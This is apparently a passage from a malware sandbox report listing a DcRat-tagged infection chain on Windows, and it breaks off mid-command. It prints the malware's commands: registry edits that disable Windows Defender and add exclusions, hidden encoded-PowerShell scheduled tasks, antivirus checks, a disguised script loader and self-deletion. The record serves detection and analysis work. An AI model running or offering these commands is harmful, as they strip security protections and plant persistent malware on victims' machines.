\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAoSMREFD" /SC once /ST 02:13:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAoSMREFD"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAoSMREFD"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfPiLOEoMHGtOUUyTU" /SC once /ST 07:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exe\" HU /site_id 525403 /S" /V1 /F7⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\ktN6_OKyWBLIic4tRrS6Y7lW.exe"C:\Users\Admin\Pictures\Adobe Films\ktN6_OKyWBLIic4tRrS6Y7lW.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s .\7a69o.PlG5⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\2Se_pjJglnDpbeqjf2ldznTA.exe"C:\Users\Admin\Pictures\Adobe Films\2Se_pjJglnDpbeqjf2ldznTA.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\robocopy.exerobocopy /?5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Organisations.jpg & ping -n 5 localhost5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AvastUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avastui.exe"7⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "avgui.exe"7⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AVGUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^rCLEJGCiZAx$" Member.jpg7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pifRespect.exe.pif z7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pifC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pif Films\2Se_pjJglnDpbeqjf2ldznTA.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 57⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost6⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\noX74RWvzcp4L6vaQgCqmGgG.exe"C:\Users\Admin\Pictures\Adobe Films\noX74RWvzcp4L6vaQgCqmGgG.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe"C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7474⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-07OLF.tmp\36tK0gCUVT2orDhALS0_tIKC.tmp"C:\Users\Admin\AppData\Local\Temp\is-07OLF.tmp\36tK0gCUVT2orDhALS0_tIKC.tmp" /SL5="$2034E,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7475⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"6⤵
-
C:\Windows\system32\reg.exereg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f7⤵
-
C:\Users\Admin\Programs\Adblock\Adblock.exe"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=4b401a7f1663313283 --downloadDate=2022-09-16T07:27:55 --distId=marketator --pid=7476⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\crashpad_handler.exeC:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-breadcrumb2" --initial-client-data=0x4a0,0x4a4,0x4a8,0x468,0x4ac,0x7ff6a3e4bc80,0x7ff6a3e4bca0,0x7ff6a3e4bcb87⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe"C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2H5V6.tmp\AdblockInstaller.tmp"C:\Users\Admin\AppData\Local\Temp\is-2H5V6.tmp\AdblockInstaller.tmp" /SL5="$701FE,11574525,792064,C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\netsh.exeC:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE7⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -install7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -start7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"6⤵
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f7⤵
- Modifies registry key
-
C:\Users\Admin\Pictures\Adobe Films\XqFLMvUeBEg_P943krgYtWkU.exe"C:\Users\Admin\Pictures\Adobe Films\XqFLMvUeBEg_P943krgYtWkU.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 51484 -s 4245⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe"C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 4605⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 7645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 7845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 8205⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 8285⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 9845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 10165⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 13765⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nvNlamGS3lVvMXNb9dzkJmr7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe" & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nvNlamGS3lVvMXNb9dzkJmr7.exe" /f6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 14125⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\N_fBXPZTfeRGqijnkDa5J2Jc.exe"C:\Users\Admin\Pictures\Adobe Films\N_fBXPZTfeRGqijnkDa5J2Jc.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe"C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 4523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 11363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 13803⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "m7tpR8y__P6zIjNc638scLmV.exe" /f & erase "C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "m7tpR8y__P6zIjNc638scLmV.exe" /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 6683⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\GosxYJzZkoJQOXo9mXaLnZ9Q.exe"C:\Users\Admin\Pictures\Minor Policy\GosxYJzZkoJQOXo9mXaLnZ9Q.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\6nu8WAAz96Ll697FGgrU_0Ep.exe"C:\Users\Admin\Pictures\Minor Policy\6nu8WAAz96Ll697FGgrU_0Ep.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe"C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @/c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\PrograData\*.dll & exit4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AppLaunch.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe"C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe"C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exe"C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe"C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe"C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" à D†/c taskkill /im Dj7oV6pePcIXJQ2f96mvaT24.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe" & del C:\PrograData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Dj7oV6pePcIXJQ2f96mvaT24.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 18123⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe" -h3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe"C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 5764 -ip 57641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5716 -ip 57161⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 71640 -s 6043⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 71640 -ip 716401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5716 -ip 57161⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 504 -p 51484 -ip 514841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5716 -ip 57161⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6012 -ip 60121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 51464 -ip 514641⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 51464 -ip 514641⤵
-
C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exeC:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exe HU /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD 